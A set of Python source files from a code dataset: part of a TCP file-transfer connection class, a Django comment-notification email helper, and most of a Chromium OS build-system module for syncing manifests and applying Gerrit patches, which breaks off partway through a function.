if version != self.SoftwareVersion:
raise Exception('different software version')
if command not in CMD_LIST:
raise Exception('unknown command received')
except:
lg.warn('invalid string received in tcp connection')
try:
self.transport.stopListening()
except:
try:
self.transport.loseConnection()
except:
lg.exc()
return
self.automat('data-received', (command, payload))
def append_outbox_file(self, filename, description='', result_defer=None, keep_alive=True):
self.outboxQueue.append((filename, description, result_defer, keep_alive))
def process_outbox_queue(self):
if self.state != 'CONNECTED':
return False
if self.stream is None:
return False
from transport.tcp import tcp_stream
has_reads = False
while len(self.outboxQueue) > 0 and len(self.stream.outboxFiles) < tcp_stream.MAX_SIMULTANEOUS_OUTGOING_FILES:
filename, description, result_defer, keep_alive = self.outboxQueue.pop(0)
has_reads = True
# we have a queue of files to be sent
# somehow file may be removed before we start sending it
# so we check it here and skip not existed files
if not os.path.isfile(filename):
self.failed_outbox_queue_item(filename, description, 'file not exist')
if not keep_alive:
self.automat('shutdown')
continue
try:
filesize = os.path.getsize(filename)
except:
self.failed_outbox_queue_item(filename, description, 'can not get file size')
if not keep_alive:
self.automat('shutdown')
continue
self.stream.create_outbox_file(filename, filesize, description, result_defer, keep_alive)
return has_reads
def failed_outbox_queue_item(self, filename, description='', error_message=''):
from transport.tcp import tcp_interface
lg.out(6, 'tcp_connection.failed_outbox_queue_item %s because %s' % (filename, error_message))
try:
tcp_interface.interface_cancelled_file_sending(
self.getAddress(), filename, 0, description, error_message).addErrback(lambda err: lg.exc(err))
except Exception as exc:
lg.warn(str(exc))
|
agpl-3.0
| -3,884,063,711,890,305,000 | 33.819355 | 160 | 0.556173 | false |
andresgz/ekratia
|
ekratia/core/email.py
|
1
|
2332
|
from ekratia.conversations.models import Thread
from ekratia.referendums.models import Referendum
from django_email import EmailTemplate
import logging
logger = logging.getLogger('ekratia')
def notify_comment_node(request, node, object_type):
"""
Method to create new comment for the current Thread
"""
root = node.get_root()
# Find Referendum or Conversation
object = None
if object_type == 'referendum':
try:
object = Referendum.objects.get(comment=root)
object_type = 'referendum'
except Referendum.DoesNotExist:
object = None
elif object_type == 'conversation':
try:
object = Thread.objects.get(comment=root)
object_type = 'conversation'
except Thread.DoesNotExist:
object = None
if not object:
return False
# Count and save comments of the object
# TODO: count and update comments
object.count_comments()
# Send message to parent comment user
try:
mail = EmailTemplate("comment_node")
mail.context = {'comment': request.data,
'user': request.user,
'request': request,
'you': node.user,
'object': object,
'object_type': object_type
}
mail.set_subject('%s replied your comment on %s'
% (request.user.get_full_name_or_username,
object.title))
if request.user != node.user:
mail.send_to_user(node.user)
except ValueError, e:
logger.error("Could not send email %s" % e)
# Send message to owner
try:
mail = EmailTemplate("comment_root")
mail.context = {'comment': request.data,
'user': request.user,
'request': request,
'you': root.user,
'object': object,
'object_type': object_type
}
mail.set_subject('%s has a new comment' % object.title)
if request.user != root.user and node.user != root.user:
mail.send_to_user(root.user)
except ValueError, e:
logger.error("Could not send email %s" % e)
|
bsd-3-clause
| -1,448,053,471,273,552,600 | 31.388889 | 67 | 0.542453 | false |
chadversary/chromiumos.chromite
|
cbuildbot/stages/sync_stages.py
|
1
|
40929
|
# Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Module containing the sync stages."""
import contextlib
import datetime
import logging
import os
import sys
from xml.etree import ElementTree
from xml.dom import minidom
from chromite.cbuildbot import cbuildbot_config
from chromite.cbuildbot import failures_lib
from chromite.cbuildbot import constants
from chromite.cbuildbot import lkgm_manager
from chromite.cbuildbot import manifest_version
from chromite.cbuildbot import repository
from chromite.cbuildbot import tree_status
from chromite.cbuildbot import trybot_patch_pool
from chromite.cbuildbot import validation_pool
from chromite.cbuildbot.stages import generic_stages
from chromite.cbuildbot.stages import build_stages
from chromite.lib import commandline
from chromite.lib import cros_build_lib
from chromite.lib import gclient
from chromite.lib import git
from chromite.lib import osutils
from chromite.lib import patch as cros_patch
from chromite.scripts import cros_mark_chrome_as_stable
PRE_CQ = validation_pool.PRE_CQ
class PatchChangesStage(generic_stages.BuilderStage):
"""Stage that patches a set of Gerrit changes to the buildroot source tree."""
def __init__(self, builder_run, patch_pool, **kwargs):
"""Construct a PatchChangesStage.
Args:
builder_run: BuilderRun object.
patch_pool: A TrybotPatchPool object containing the different types of
patches to apply.
"""
super(PatchChangesStage, self).__init__(builder_run, **kwargs)
self.patch_pool = patch_pool
@staticmethod
def _CheckForDuplicatePatches(_series, changes):
conflicts = {}
duplicates = []
for change in changes:
if change.id is None:
cros_build_lib.Warning(
"Change %s lacks a usable ChangeId; duplicate checking cannot "
"be done for this change. If cherry-picking fails, this is a "
"potential cause.", change)
continue
conflicts.setdefault(change.id, []).append(change)
duplicates = [x for x in conflicts.itervalues() if len(x) > 1]
if not duplicates:
return changes
for conflict in duplicates:
cros_build_lib.Error(
"Changes %s conflict with each other- they have same id %s.",
', '.join(map(str, conflict)), conflict[0].id)
cros_build_lib.Die("Duplicate patches were encountered: %s", duplicates)
def _PatchSeriesFilter(self, series, changes):
return self._CheckForDuplicatePatches(series, changes)
def _ApplyPatchSeries(self, series, patch_pool, **kwargs):
"""Applies a patch pool using a patch series."""
kwargs.setdefault('frozen', False)
# Honor the given ordering, so that if a gerrit/remote patch
# conflicts w/ a local patch, the gerrit/remote patch are
# blamed rather than local (patch ordering is typically
# local, gerrit, then remote).
kwargs.setdefault('honor_ordering', True)
kwargs['changes_filter'] = self._PatchSeriesFilter
_applied, failed_tot, failed_inflight = series.Apply(
list(patch_pool), **kwargs)
failures = failed_tot + failed_inflight
if failures:
self.HandleApplyFailures(failures)
def HandleApplyFailures(self, failures):
cros_build_lib.Die("Failed applying patches: %s",
"\n".join(map(str, failures)))
def PerformStage(self):
class NoisyPatchSeries(validation_pool.PatchSeries):
"""Custom PatchSeries that adds links to buildbot logs for remote trys."""
def ApplyChange(self, change):
if isinstance(change, cros_patch.GerritPatch):
cros_build_lib.PrintBuildbotLink(str(change), change.url)
elif isinstance(change, cros_patch.UploadedLocalPatch):
cros_build_lib.PrintBuildbotStepText(str(change))
return validation_pool.PatchSeries.ApplyChange(self, change)
# If we're an external builder, ignore internal patches.
helper_pool = validation_pool.HelperPool.SimpleCreate(
cros_internal=self._run.config.internal, cros=True)
# Limit our resolution to non-manifest patches.
patch_series = NoisyPatchSeries(
self._build_root,
helper_pool=helper_pool,
deps_filter_fn=lambda p: not trybot_patch_pool.ManifestFilter(p))
self._ApplyPatchSeries(patch_series, self.patch_pool)
class BootstrapStage(PatchChangesStage):
"""Stage that patches a chromite repo and re-executes inside it.
Attributes:
returncode - the returncode of the cbuildbot re-execution. Valid after
calling stage.Run().
"""
option_name = 'bootstrap'
def __init__(self, builder_run, chromite_patch_pool,
manifest_patch_pool=None, **kwargs):
super(BootstrapStage, self).__init__(
builder_run, trybot_patch_pool.TrybotPatchPool(), **kwargs)
self.chromite_patch_pool = chromite_patch_pool
self.manifest_patch_pool = manifest_patch_pool
self.returncode = None
def _ApplyManifestPatches(self, patch_pool):
"""Apply a pool of manifest patches to a temp manifest checkout.
Args:
patch_pool: The pool to apply.
Returns:
The path to the patched manifest checkout.
Raises:
Exception, if the new patched manifest cannot be parsed.
"""
checkout_dir = os.path.join(self.tempdir, 'manfest-checkout')
repository.CloneGitRepo(checkout_dir,
self._run.config.manifest_repo_url)
patch_series = validation_pool.PatchSeries.WorkOnSingleRepo(
checkout_dir, tracking_branch=self._run.manifest_branch)
self._ApplyPatchSeries(patch_series, patch_pool)
# Create the branch that 'repo init -b <target_branch> -u <patched_repo>'
# will look for.
cmd = ['branch', '-f', self._run.manifest_branch,
constants.PATCH_BRANCH]
git.RunGit(checkout_dir, cmd)
# Verify that the patched manifest loads properly. Propagate any errors as
# exceptions.
manifest = os.path.join(checkout_dir, self._run.config.manifest)
git.Manifest.Cached(manifest, manifest_include_dir=checkout_dir)
return checkout_dir
@staticmethod
def _FilterArgsForApi(parsed_args, api_minor):
"""Remove arguments that are introduced after an api version."""
def filter_fn(passed_arg):
return passed_arg.opt_inst.api_version <= api_minor
accepted, removed = commandline.FilteringParser.FilterArgs(
parsed_args, filter_fn)
if removed:
cros_build_lib.Warning('The following arguments were removed due to api: '
"'%s'" % ' '.join(removed))
return accepted
@classmethod
def FilterArgsForTargetCbuildbot(cls, buildroot, cbuildbot_path, options):
_, minor = cros_build_lib.GetTargetChromiteApiVersion(buildroot)
args = [cbuildbot_path]
args.extend(options.build_targets)
args.extend(cls._FilterArgsForApi(options.parsed_args, minor))
# Only pass down --cache-dir if it was specified. By default, we want
# the cache dir to live in the root of each checkout, so this means that
# each instance of cbuildbot needs to calculate the default separately.
if minor >= 2 and options.cache_dir_specified:
args += ['--cache-dir', options.cache_dir]
return args
def HandleApplyFailures(self, failures):
"""Handle the case where patches fail to apply."""
if self._run.options.pre_cq or self._run.config.pre_cq:
# Let the PreCQSync stage handle this failure. The PreCQSync stage will
# comment on CLs with the appropriate message when they fail to apply.
#
# WARNING: For manifest patches, the Pre-CQ attempts to apply external
# patches to the internal manifest, and this means we may flag a conflict
# here even if the patch applies cleanly. TODO(davidjames): Fix this.
cros_build_lib.PrintBuildbotStepWarnings()
cros_build_lib.Error('Failed applying patches: %s',
'\n'.join(map(str, failures)))
else:
PatchChangesStage.HandleApplyFailures(self, failures)
#pylint: disable=E1101
@osutils.TempDirDecorator
def PerformStage(self):
# The plan for the builders is to use master branch to bootstrap other
# branches. Now, if we wanted to test patches for both the bootstrap code
# (on master) and the branched chromite (say, R20), we need to filter the
# patches by branch.
filter_branch = self._run.manifest_branch
if self._run.options.test_bootstrap:
filter_branch = 'master'
chromite_dir = os.path.join(self.tempdir, 'chromite')
reference_repo = os.path.join(constants.SOURCE_ROOT, 'chromite', '.git')
repository.CloneGitRepo(chromite_dir, constants.CHROMITE_URL,
reference=reference_repo)
git.RunGit(chromite_dir, ['checkout', filter_branch])
def BranchAndChromiteFilter(patch):
return (trybot_patch_pool.BranchFilter(filter_branch, patch) and
trybot_patch_pool.ChromiteFilter(patch))
patch_series = validation_pool.PatchSeries.WorkOnSingleRepo(
chromite_dir, filter_branch,
deps_filter_fn=BranchAndChromiteFilter)
filtered_pool = self.chromite_patch_pool.FilterBranch(filter_branch)
if filtered_pool:
self._ApplyPatchSeries(patch_series, filtered_pool)
cbuildbot_path = constants.PATH_TO_CBUILDBOT
if not os.path.exists(os.path.join(self.tempdir, cbuildbot_path)):
cbuildbot_path = 'chromite/cbuildbot/cbuildbot'
# pylint: disable=W0212
cmd = self.FilterArgsForTargetCbuildbot(self.tempdir, cbuildbot_path,
self._run.options)
extra_params = ['--sourceroot=%s' % self._run.options.sourceroot]
extra_params.extend(self._run.options.bootstrap_args)
if self._run.options.test_bootstrap:
# We don't want re-executed instance to see this.
cmd = [a for a in cmd if a != '--test-bootstrap']
else:
# If we've already done the desired number of bootstraps, disable
# bootstrapping for the next execution. Also pass in the patched manifest
# repository.
extra_params.append('--nobootstrap')
if self.manifest_patch_pool:
manifest_dir = self._ApplyManifestPatches(self.manifest_patch_pool)
extra_params.extend(['--manifest-repo-url', manifest_dir])
cmd += extra_params
result_obj = cros_build_lib.RunCommand(
cmd, cwd=self.tempdir, kill_timeout=30, error_code_ok=True)
self.returncode = result_obj.returncode
class SyncStage(generic_stages.BuilderStage):
"""Stage that performs syncing for the builder."""
option_name = 'sync'
output_manifest_sha1 = True
def __init__(self, builder_run, **kwargs):
super(SyncStage, self).__init__(builder_run, **kwargs)
self.repo = None
self.skip_sync = False
# TODO(mtennant): Why keep a duplicate copy of this config value
# at self.internal when it can always be retrieved from config?
self.internal = self._run.config.internal
def _GetManifestVersionsRepoUrl(self, read_only=False):
return cbuildbot_config.GetManifestVersionsRepoUrl(
self.internal,
read_only=read_only)
def Initialize(self):
self._InitializeRepo()
def _InitializeRepo(self):
"""Set up the RepoRepository object."""
self.repo = self.GetRepoRepository()
def GetNextManifest(self):
"""Returns the manifest to use."""
return self._run.config.manifest
def ManifestCheckout(self, next_manifest):
"""Checks out the repository to the given manifest."""
self._Print('\n'.join(['BUILDROOT: %s' % self.repo.directory,
'TRACKING BRANCH: %s' % self.repo.branch,
'NEXT MANIFEST: %s' % next_manifest]))
if not self.skip_sync:
self.repo.Sync(next_manifest)
print >> sys.stderr, self.repo.ExportManifest(
mark_revision=self.output_manifest_sha1)
def RunPrePatchBuild(self):
"""Run through a pre-patch build to prepare for incremental build.
This function runs though the InitSDKStage, SetupBoardStage, and
BuildPackagesStage. It is intended to be called before applying
any patches under test, to prepare the chroot and sysroot in a state
corresponding to ToT prior to an incremental build.
Returns:
True if all stages were successful, False if any of them failed.
"""
suffix = ' (pre-Patch)'
try:
build_stages.InitSDKStage(
self._run, chroot_replace=True, suffix=suffix).Run()
for builder_run in self._run.GetUngroupedBuilderRuns():
for board in builder_run.config.boards:
build_stages.SetupBoardStage(
builder_run, board=board, suffix=suffix).Run()
build_stages.BuildPackagesStage(
builder_run, board=board, suffix=suffix).Run()
except failures_lib.StepFailure:
return False
return True
@failures_lib.SetFailureType(failures_lib.InfrastructureFailure)
def PerformStage(self):
self.Initialize()
with osutils.TempDir() as tempdir:
# Save off the last manifest.
fresh_sync = True
if os.path.exists(self.repo.directory) and not self._run.options.clobber:
old_filename = os.path.join(tempdir, 'old.xml')
try:
old_contents = self.repo.ExportManifest()
except cros_build_lib.RunCommandError as e:
cros_build_lib.Warning(str(e))
else:
osutils.WriteFile(old_filename, old_contents)
fresh_sync = False
# Sync.
self.ManifestCheckout(self.GetNextManifest())
# Print the blamelist.
if fresh_sync:
cros_build_lib.PrintBuildbotStepText('(From scratch)')
elif self._run.options.buildbot:
lkgm_manager.GenerateBlameList(self.repo, old_filename)
# Incremental builds request an additional build before patching changes.
if self._run.config.build_before_patching:
pre_build_passed = self.RunPrePatchBuild()
if not pre_build_passed:
cros_build_lib.PrintBuildbotStepText('Pre-patch build failed.')
class LKGMSyncStage(SyncStage):
"""Stage that syncs to the last known good manifest blessed by builders."""
output_manifest_sha1 = False
def GetNextManifest(self):
"""Override: Gets the LKGM."""
# TODO(sosa): Should really use an initialized manager here.
if self.internal:
mv_dir = 'manifest-versions-internal'
else:
mv_dir = 'manifest-versions'
manifest_path = os.path.join(self._build_root, mv_dir)
manifest_repo = self._GetManifestVersionsRepoUrl(read_only=True)
manifest_version.RefreshManifestCheckout(manifest_path, manifest_repo)
return os.path.join(manifest_path, lkgm_manager.LKGMManager.LKGM_PATH)
class ManifestVersionedSyncStage(SyncStage):
"""Stage that generates a unique manifest file, and sync's to it."""
# TODO(mtennant): Make this into a builder run value.
output_manifest_sha1 = False
def __init__(self, builder_run, **kwargs):
# Perform the sync at the end of the stage to the given manifest.
super(ManifestVersionedSyncStage, self).__init__(builder_run, **kwargs)
self.repo = None
self.manifest_manager = None
# If a builder pushes changes (even with dryrun mode), we need a writable
# repository. Otherwise, the push will be rejected by the server.
self.manifest_repo = self._GetManifestVersionsRepoUrl(read_only=False)
# 1. If we're uprevving Chrome, Chrome might have changed even if the
# manifest has not, so we should force a build to double check. This
# means that we'll create a new manifest, even if there are no changes.
# 2. If we're running with --debug, we should always run through to
# completion, so as to ensure a complete test.
self._force = self._chrome_rev or self._run.options.debug
def HandleSkip(self):
"""Initializes a manifest manager to the specified version if skipped."""
super(ManifestVersionedSyncStage, self).HandleSkip()
if self._run.options.force_version:
self.Initialize()
self.ForceVersion(self._run.options.force_version)
def ForceVersion(self, version):
"""Creates a manifest manager from given version and returns manifest."""
cros_build_lib.PrintBuildbotStepText(version)
return self.manifest_manager.BootstrapFromVersion(version)
def VersionIncrementType(self):
"""Return which part of the version number should be incremented."""
if self._run.manifest_branch == 'master':
return 'build'
return 'branch'
def RegisterManifestManager(self, manifest_manager):
"""Save the given manifest manager for later use in this run.
Args:
manifest_manager: Expected to be a BuildSpecsManager.
"""
self._run.attrs.manifest_manager = self.manifest_manager = manifest_manager
def Initialize(self):
"""Initializes a manager that manages manifests for associated stages."""
dry_run = self._run.options.debug
self._InitializeRepo()
# If chrome_rev is somehow set, fail.
assert not self._chrome_rev, \
'chrome_rev is unsupported on release builders.'
self.RegisterManifestManager(manifest_version.BuildSpecsManager(
source_repo=self.repo,
manifest_repo=self.manifest_repo,
manifest=self._run.config.manifest,
build_names=self._run.GetBuilderIds(),
incr_type=self.VersionIncrementType(),
force=self._force,
branch=self._run.manifest_branch,
dry_run=dry_run,
master=self._run.config.master))
def _SetChromeVersionIfApplicable(self, manifest):
"""If 'chrome' is in |manifest|, write the version to the BuilderRun object.
Args:
manifest: Path to the manifest.
"""
manifest_dom = minidom.parse(manifest)
elements = manifest_dom.getElementsByTagName(lkgm_manager.CHROME_ELEMENT)
if elements:
chrome_version = elements[0].getAttribute(
lkgm_manager.CHROME_VERSION_ATTR)
logging.info(
'Chrome version was found in the manifest: %s', chrome_version)
# Update the metadata dictionary. This is necessary because the
# metadata dictionary is preserved through re-executions, so
# SyncChromeStage can read the version from the dictionary
# later. This is easier than parsing the manifest again after
# the re-execution.
self._run.attrs.metadata.UpdateKeyDictWithDict(
'version', {'chrome': chrome_version})
def GetNextManifest(self):
"""Uses the initialized manifest manager to get the next manifest."""
assert self.manifest_manager, \
'Must run GetStageManager before checkout out build.'
to_return = self.manifest_manager.GetNextBuildSpec(
dashboard_url=self.ConstructDashboardURL())
previous_version = self.manifest_manager.GetLatestPassingSpec()
target_version = self.manifest_manager.current_version
# Print the Blamelist here.
url_prefix = 'http://chromeos-images.corp.google.com/diff/report?'
url = url_prefix + 'from=%s&to=%s' % (previous_version, target_version)
cros_build_lib.PrintBuildbotLink('Blamelist', url)
# The testManifestVersionedSyncOnePartBranch interacts badly with this
# function. It doesn't fully initialize self.manifest_manager which
# causes target_version to be None. Since there isn't a clean fix in
# either direction, just throw this through str(). In the normal case,
# it's already a string anyways.
cros_build_lib.PrintBuildbotStepText(str(target_version))
return to_return
@contextlib.contextmanager
def LocalizeManifest(self, manifest, filter_cros=False):
"""Remove restricted checkouts from the manifest if needed.
Args:
manifest: The manifest to localize.
filter_cros: If set, then only checkouts with a remote of 'cros' or
'cros-internal' are kept, and the rest are filtered out.
"""
if filter_cros:
with osutils.TempDir() as tempdir:
filtered_manifest = os.path.join(tempdir, 'filtered.xml')
doc = ElementTree.parse(manifest)
root = doc.getroot()
for node in root.findall('project'):
remote = node.attrib.get('remote')
if remote and remote not in constants.GIT_REMOTES:
root.remove(node)
doc.write(filtered_manifest)
yield filtered_manifest
else:
yield manifest
@failures_lib.SetFailureType(failures_lib.InfrastructureFailure)
def PerformStage(self):
self.Initialize()
if self._run.options.force_version:
next_manifest = self.ForceVersion(self._run.options.force_version)
else:
next_manifest = self.GetNextManifest()
if not next_manifest:
cros_build_lib.Info('Found no work to do.')
if self._run.attrs.manifest_manager.DidLastBuildFail():
raise failures_lib.StepFailure('The previous build failed.')
else:
sys.exit(0)
# Log this early on for the release team to grep out before we finish.
if self.manifest_manager:
self._Print('\nRELEASETAG: %s\n' % (
self.manifest_manager.current_version))
self._SetChromeVersionIfApplicable(next_manifest)
# To keep local trybots working, remove restricted checkouts from the
# official manifest we get from manifest-versions.
with self.LocalizeManifest(
next_manifest, filter_cros=self._run.options.local) as new_manifest:
self.ManifestCheckout(new_manifest)
class MasterSlaveSyncStage(ManifestVersionedSyncStage):
"""Stage that generates a unique manifest file candidate, and sync's to it."""
# TODO(mtennant): Turn this into self._run.attrs.sub_manager or similar.
# An instance of lkgm_manager.LKGMManager for slave builds.
sub_manager = None
def __init__(self, builder_run, **kwargs):
super(MasterSlaveSyncStage, self).__init__(builder_run, **kwargs)
# lkgm_manager deals with making sure we're synced to whatever manifest
# we get back in GetNextManifest so syncing again is redundant.
self.skip_sync = True
self._chrome_version = None
def _GetInitializedManager(self, internal):
"""Returns an initialized lkgm manager.
Args:
internal: Boolean. True if this is using an internal manifest.
Returns:
lkgm_manager.LKGMManager.
"""
increment = self.VersionIncrementType()
return lkgm_manager.LKGMManager(
source_repo=self.repo,
manifest_repo=cbuildbot_config.GetManifestVersionsRepoUrl(
internal, read_only=False),
manifest=self._run.config.manifest,
build_names=self._run.GetBuilderIds(),
build_type=self._run.config.build_type,
incr_type=increment,
force=self._force,
branch=self._run.manifest_branch,
dry_run=self._run.options.debug,
master=self._run.config.master)
def Initialize(self):
"""Override: Creates an LKGMManager rather than a ManifestManager."""
self._InitializeRepo()
self.RegisterManifestManager(self._GetInitializedManager(self.internal))
if (self._run.config.master and self._GetSlaveConfigs()):
assert self.internal, 'Unified masters must use an internal checkout.'
MasterSlaveSyncStage.sub_manager = self._GetInitializedManager(False)
def ForceVersion(self, version):
manifest = super(MasterSlaveSyncStage, self).ForceVersion(version)
if MasterSlaveSyncStage.sub_manager:
MasterSlaveSyncStage.sub_manager.BootstrapFromVersion(version)
return manifest
def GetNextManifest(self):
"""Gets the next manifest using LKGM logic."""
assert self.manifest_manager, \
'Must run Initialize before we can get a manifest.'
assert isinstance(self.manifest_manager, lkgm_manager.LKGMManager), \
'Manifest manager instantiated with wrong class.'
if self._run.config.master:
manifest = self.manifest_manager.CreateNewCandidate(
chrome_version=self._chrome_version)
if MasterSlaveSyncStage.sub_manager:
MasterSlaveSyncStage.sub_manager.CreateFromManifest(
manifest, dashboard_url=self.ConstructDashboardURL())
return manifest
else:
return self.manifest_manager.GetLatestCandidate(
dashboard_url=self.ConstructDashboardURL())
def GetLatestChromeVersion(self):
"""Returns the version of Chrome to uprev."""
return cros_mark_chrome_as_stable.GetLatestRelease(gclient.GetBaseURLs()[0])
@failures_lib.SetFailureType(failures_lib.InfrastructureFailure)
def PerformStage(self):
"""Performs the stage."""
if (self._chrome_rev == constants.CHROME_REV_LATEST and
self._run.config.master):
# PFQ master needs to determine what version of Chrome to build
# for all slaves.
self._chrome_version = self.GetLatestChromeVersion()
ManifestVersionedSyncStage.PerformStage(self)
class CommitQueueSyncStage(MasterSlaveSyncStage):
"""Commit Queue Sync stage that handles syncing and applying patches.
This stage handles syncing to a manifest, passing around that manifest to
other builders and finding the Gerrit Reviews ready to be committed and
applying them into its own checkout.
"""
def __init__(self, builder_run, **kwargs):
super(CommitQueueSyncStage, self).__init__(builder_run, **kwargs)
# Figure out the builder's name from the buildbot waterfall.
builder_name = self._run.config.paladin_builder_name
self.builder_name = builder_name if builder_name else self._run.config.name
# The pool of patches to be picked up by the commit queue.
# - For the master commit queue, it's initialized in GetNextManifest.
# - For slave commit queues, it's initialized in _SetPoolFromManifest.
#
# In all cases, the pool is saved to disk.
self.pool = None
def HandleSkip(self):
"""Handles skip and initializes validation pool from manifest."""
super(CommitQueueSyncStage, self).HandleSkip()
filename = self._run.options.validation_pool
if filename:
self.pool = validation_pool.ValidationPool.Load(filename,
metadata=self._run.attrs.metadata, record_patches=False)
else:
self._SetPoolFromManifest(self.manifest_manager.GetLocalManifest())
def _ChangeFilter(self, pool, changes, non_manifest_changes):
# First, look for changes that were tested by the Pre-CQ.
changes_to_test = []
for change in changes:
status = pool.GetCLStatus(PRE_CQ, change)
if status == manifest_version.BuilderStatus.STATUS_PASSED:
changes_to_test.append(change)
# If we only see changes that weren't verified by Pre-CQ, try all of the
# changes. This ensures that the CQ continues to work even if the Pre-CQ is
# down.
if not changes_to_test:
changes_to_test = changes
return changes_to_test, non_manifest_changes
def _SetPoolFromManifest(self, manifest):
"""Sets validation pool based on manifest path passed in."""
# Note that GetNextManifest() calls GetLatestCandidate() in this case,
# so the repo will already be sync'd appropriately. This means that
# AcquirePoolFromManifest does not need to sync.
self.pool = validation_pool.ValidationPool.AcquirePoolFromManifest(
manifest, self._run.config.overlays, self.repo,
self._run.buildnumber, self.builder_name,
self._run.config.master, self._run.options.debug,
metadata=self._run.attrs.metadata)
def GetNextManifest(self):
"""Gets the next manifest using LKGM logic."""
assert self.manifest_manager, \
'Must run Initialize before we can get a manifest.'
assert isinstance(self.manifest_manager, lkgm_manager.LKGMManager), \
'Manifest manager instantiated with wrong class.'
if self._run.config.master:
try:
# In order to acquire a pool, we need an initialized buildroot.
if not git.FindRepoDir(self.repo.directory):
self.repo.Initialize()
self.pool = pool = validation_pool.ValidationPool.AcquirePool(
self._run.config.overlays, self.repo,
self._run.buildnumber, self.builder_name,
self._run.options.debug,
check_tree_open=not self._run.options.debug or
self._run.options.mock_tree_status,
changes_query=self._run.options.cq_gerrit_override,
change_filter=self._ChangeFilter, throttled_ok=True,
metadata=self._run.attrs.metadata)
except validation_pool.TreeIsClosedException as e:
cros_build_lib.Warning(str(e))
return None
manifest = self.manifest_manager.CreateNewCandidate(validation_pool=pool)
if MasterSlaveSyncStage.sub_manager:
MasterSlaveSyncStage.sub_manager.CreateFromManifest(
manifest, dashboard_url=self.ConstructDashboardURL())
return manifest
else:
manifest = self.manifest_manager.GetLatestCandidate(
dashboard_url=self.ConstructDashboardURL())
if manifest:
if self._run.config.build_before_patching:
pre_build_passed = self.RunPrePatchBuild()
cros_build_lib.PrintBuildbotStepName(
'CommitQueueSync : Apply Patches')
if not pre_build_passed:
cros_build_lib.PrintBuildbotStepText('Pre-patch build failed.')
self._SetPoolFromManifest(manifest)
self.pool.ApplyPoolIntoRepo()
return manifest
@failures_lib.SetFailureType(failures_lib.InfrastructureFailure)
def PerformStage(self):
"""Performs normal stage and prints blamelist at end."""
if self._run.options.force_version:
self.HandleSkip()
else:
ManifestVersionedSyncStage.PerformStage(self)
class PreCQSyncStage(SyncStage):
"""Sync and apply patches to test if they compile."""
def __init__(self, builder_run, patches, **kwargs):
super(PreCQSyncStage, self).__init__(builder_run, **kwargs)
# The list of patches to test.
self.patches = patches
# The ValidationPool of patches to test. Initialized in PerformStage, and
# refreshed after bootstrapping by HandleSkip.
self.pool = None
def HandleSkip(self):
"""Handles skip and loads validation pool from disk."""
super(PreCQSyncStage, self).HandleSkip()
filename = self._run.options.validation_pool
if filename:
self.pool = validation_pool.ValidationPool.Load(filename,
metadata=self._run.attrs.metadata)
def PerformStage(self):
super(PreCQSyncStage, self).PerformStage()
self.pool = validation_pool.ValidationPool.AcquirePreCQPool(
self._run.config.overlays, self._build_root,
self._run.buildnumber, self._run.config.name,
dryrun=self._run.options.debug_forced, changes=self.patches,
metadata=self._run.attrs.metadata)
self.pool.ApplyPoolIntoRepo()
if len(self.pool.changes) == 0:
cros_build_lib.Die('No changes have been applied.')
class PreCQLauncherStage(SyncStage):
"""Scans for CLs and automatically launches Pre-CQ jobs to test them."""
STATUS_INFLIGHT = validation_pool.ValidationPool.STATUS_INFLIGHT
STATUS_PASSED = validation_pool.ValidationPool.STATUS_PASSED
STATUS_FAILED = validation_pool.ValidationPool.STATUS_FAILED
STATUS_LAUNCHING = validation_pool.ValidationPool.STATUS_LAUNCHING
STATUS_WAITING = validation_pool.ValidationPool.STATUS_WAITING
# The number of minutes we allow before considering a launch attempt failed.
# If this window isn't hit in a given launcher run, the window will start
# again from scratch in the next run.
LAUNCH_DELAY = 30
# The number of minutes we allow before considering an in-flight
# job failed. If this window isn't hit in a given launcher run, the window
# will start again from scratch in the next run.
INFLIGHT_DELAY = 120
# The maximum number of patches we will allow in a given trybot run. This is
# needed because our trybot infrastructure can only handle so many patches at
# once.
MAX_PATCHES_PER_TRYBOT_RUN = 50
def __init__(self, builder_run, **kwargs):
super(PreCQLauncherStage, self).__init__(builder_run, **kwargs)
self.skip_sync = True
# Mapping from launching changes to the first known time when they
# were launching.
self.launching = {}
# Mapping from inflight changes to the first known time when they
# were inflight.
self.inflight = {}
self.retried = set()
def _HasLaunchTimedOut(self, change):
"""Check whether a given |change| has timed out on its trybot launch.
Assumes that the change is in the middle of being launched.
Returns:
True if the change has timed out. False otherwise.
"""
diff = datetime.timedelta(minutes=self.LAUNCH_DELAY)
return datetime.datetime.now() - self.launching[change] > diff
def _HasInflightTimedOut(self, change):
"""Check whether a given |change| has timed out while trybot inflight.
Assumes that the change's trybot is inflight.
Returns:
True if the change has timed out. False otherwise.
"""
diff = datetime.timedelta(minutes=self.INFLIGHT_DELAY)
return datetime.datetime.now() - self.inflight[change] > diff
@staticmethod
def _PrintPatchStatus(patch, status):
"""Print a link to |patch| with |status| info."""
items = (
status,
os.path.basename(patch.project),
str(patch),
)
cros_build_lib.PrintBuildbotLink(' | '.join(items), patch.url)
def GetPreCQStatus(self, pool, changes):
"""Get the Pre-CQ status of a list of changes.
Side effect: reject or retry changes that have timed out.
Args:
pool: The validation pool.
changes: Changes to examine.
Returns:
busy: The set of CLs that are currently being tested.
passed: The set of CLs that have been verified.
"""
busy, passed = set(), set()
for change in changes:
status = pool.GetCLStatus(PRE_CQ, change)
if status != self.STATUS_LAUNCHING:
# The trybot is not launching, so we should remove it from our
# launching timeout map.
self.launching.pop(change, None)
if status != self.STATUS_INFLIGHT:
# The trybot is not inflight, so we should remove it from our
# inflight timeout map.
self.inflight.pop(change, None)
if status == self.STATUS_LAUNCHING:
# The trybot is in the process of launching.
busy.add(change)
if change not in self.launching:
# Record the launch time of changes.
self.launching[change] = datetime.datetime.now()
elif self._HasLaunchTimedOut(change):
if change in self.retried:
msg = ('We were not able to launch a pre-cq trybot for your change.'
'\n\n'
'This problem can happen if the trybot waterfall is very '
'busy, or if there is an infrastructure issue. Please '
'notify the sheriff and mark your change as ready again. If '
'this problem occurs multiple times in a row, please file a '
'bug.')
pool.SendNotification(change, '%(details)s', details=msg)
pool.RemoveCommitReady(change)
pool.UpdateCLStatus(PRE_CQ, change, self.STATUS_FAILED,
self._run.options.debug)
self.retried.discard(change)
else:
# Try the change again.
self.retried.add(change)
pool.UpdateCLStatus(PRE_CQ, change, self.STATUS_WAITING,
self._run.options.debug)
elif status == self.STATUS_INFLIGHT:
# Once a Pre-CQ run actually starts, it'll set the status to
# STATUS_INFLIGHT.
busy.add(change)
if change not in self.inflight:
# Record the inflight start time.
